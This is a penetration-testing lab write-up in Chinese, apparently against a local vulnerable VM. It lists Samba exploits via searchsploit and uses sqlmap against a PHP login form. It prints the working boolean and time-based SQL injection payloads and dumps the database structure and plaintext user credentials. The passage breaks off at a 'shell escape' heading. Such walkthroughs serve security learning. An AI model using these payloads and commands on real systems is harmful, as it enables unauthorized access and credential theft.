┌──(root㉿kali)-[/home/kali]
└─# searchsploit samba 3.
------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Meta | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit) | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Met | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow | linux/dos/27778.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
Sambar Server 4.3/4.4 Beta 3 - Search CGI | windows/remote/20223.txt
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access | windows/remote/24163.txt
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
三、渗透测试
3.1 SQL注入
3.1.1 Burp Suit抓登录包
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# vim sql.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# cat sql.txt
POST /checklogin.php HTTP/1.1
Host: 192.168.1.6
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.6
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.6/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
myusername=admin&mypassword=123456&Submit=Login
3.1.2 爆破数据库
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --dbs
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:35:59 /2024-06-12/
[09:35:59] [INFO] parsing HTTP request from 'sql.txt'
[09:36:00] [INFO] testing connection to the target URL
[09:36:00] [INFO] testing if the target URL content is stable
[09:36:00] [INFO] target URL content is stable
[09:36:00] [INFO] testing if POST parameter 'myusername' is dynamic
[09:36:00] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[09:36:00] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:36:00] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[09:36:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:36:01] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[09:36:01] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:02] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:36:02] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:04] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[09:36:04] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[09:36:05] [INFO] testing 'Oracle error-based - Parameter replace'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[09:36:05] [INFO] testing 'Generic inline queries'
[09:36:05] [INFO] testing 'MySQL inline queries'
[09:36:05] [INFO] testing 'PostgreSQL inline queries'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:36:05] [INFO] testing 'Oracle inline queries'
[09:36:05] [INFO] testing 'SQLite inline queries'
[09:36:06] [INFO] testing 'Firebird inline queries'
[09:36:06] [INFO] testing 'ClickHouse inline queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:36:06] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[09:36:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:36:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[09:36:08] [INFO] testing 'Oracle AND time-based blind'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[09:36:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:36:10] [WARNING] POST parameter 'myusername' does not seem to be injectable
[09:36:10] [INFO] testing if POST parameter 'mypassword' is dynamic
[09:36:10] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[09:36:10] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[09:36:10] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:10] [INFO] POST parameter 'mypassword' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="28")
[09:36:10] [INFO] testing 'Generic inline queries'
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
got a 302 redirect to 'http://192.168.1.6/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:36:11] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:36:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:36:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL inline queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:21] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:36:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:36:21] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[09:36:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:23] [INFO] testing 'Generic UNION query (59) - 21 to 40 columns'
[09:36:23] [INFO] testing 'Generic UNION query (59) - 41 to 60 columns'
[09:36:23] [INFO] testing 'MySQL UNION query (59) - 1 to 20 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 21 to 40 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 41 to 60 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 61 to 80 columns'
[09:36:25] [INFO] testing 'MySQL UNION query (59) - 81 to 100 columns'
[09:36:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1473 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:36:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:36:25] [INFO] fetching database names
[09:36:25] [INFO] fetching number of databases
[09:36:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:25] [INFO] retrieved: 3
[09:36:25] [INFO] retrieved: information_schema
[09:36:26] [INFO] retrieved: members
[09:36:26] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql
[09:36:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:36:27 /2024-06-12/
获得数据库
- information_schema
- members
- mysql
3.1.3 当前连接的数据库
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --current-db
___
__H__
___ ___[.]_____ ___ ___ {1.8.3#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:42:14 /2024-06-12/
[09:42:14] [INFO] parsing HTTP request from 'sql.txt'
[09:42:15] [INFO] resuming back-end DBMS 'mysql'
[09:42:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:42:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:42:15] [INFO] fetching current database
[09:42:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:42:15] [INFO] retrieved: members
current database: 'members'
[09:42:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:42:15 /2024-06-12/
当前连接的数据库是
- members
3.1.4 连接的数据库的表名
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members --tables
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:45:10 /2024-06-12/
[09:45:10] [INFO] parsing HTTP request from 'sql.txt'
[09:45:10] [INFO] resuming back-end DBMS 'mysql'
[09:45:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:45:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:45:11] [INFO] fetching tables for database: 'members'
[09:45:11] [INFO] fetching number of tables for database 'members'
[09:45:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:45:11] [INFO] retrieved: 1
[09:45:11] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+
[09:45:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:45:11 /2024-06-12/
连接的数据库是:members
表名是:members
3.1.5 字段名
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members --columns
___
__H__
___ ___[.]_____ ___ ___ {1.8.3#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:48:22 /2024-06-12/
[09:48:22] [INFO] parsing HTTP request from 'sql.txt'
[09:48:22] [INFO] resuming back-end DBMS 'mysql'
[09:48:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:48:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:48:22] [INFO] fetching columns for table 'members' in database 'members'
[09:48:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:48:22] [INFO] retrieved: 3
[09:48:22] [INFO] retrieved: id
[09:48:23] [INFO] retrieved: int(4)
[09:48:23] [INFO] retrieved: username
[09:48:23] [INFO] retrieved: varchar(65)
[09:48:24] [INFO] retrieved: password
[09:48:24] [INFO] retrieved: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
[09:48:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 09:48:25 /2024-06-12/
获得字段名
- id
- password
- username
3.1.6 用户名和密码
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members -C id,username,password --dump
___
__H__
___ ___[(]_____ ___ ___ {1.8.3#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:52:26 /2024-06-12/
[09:52:26] [INFO] parsing HTTP request from 'sql.txt'
[09:52:26] [INFO] resuming back-end DBMS 'mysql'
[09:52:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:52:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:52:26] [INFO] fetching entries of column(s) 'id,password,username' for table 'members' in database 'members'
[09:52:26] [INFO] fetching number of column(s) 'id,password,username' entries for table 'members' in database 'members'
[09:52:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:52:26] [INFO] retrieved: 2
[09:52:26] [INFO] retrieved: 1
[09:52:26] [INFO] retrieved: MyNameIsJohn
[09:52:27] [INFO] retrieved: john
[09:52:27] [INFO] retrieved: 2
[09:52:27] [INFO] retrieved: ADGAds
[09:52:28] [INFO] retrieved:
[09:52:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[09:52:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:52:43] [INFO] adjusting time delay to 1 second due to good response times
robert
Database: members
Table: members
[2 entries]
+----+----------+--------------+
| id | username | password |
+----+----------+--------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAds |
+----+----------+--------------+
获得用户名和密码
| 用户名 | 密码 |
|---|---|
| john | MyNameIsJohn |
| robert | ADGAds |
3.2 shell逃逸
3.2.1 ssh登录
Xshell 7 (Build 0063)
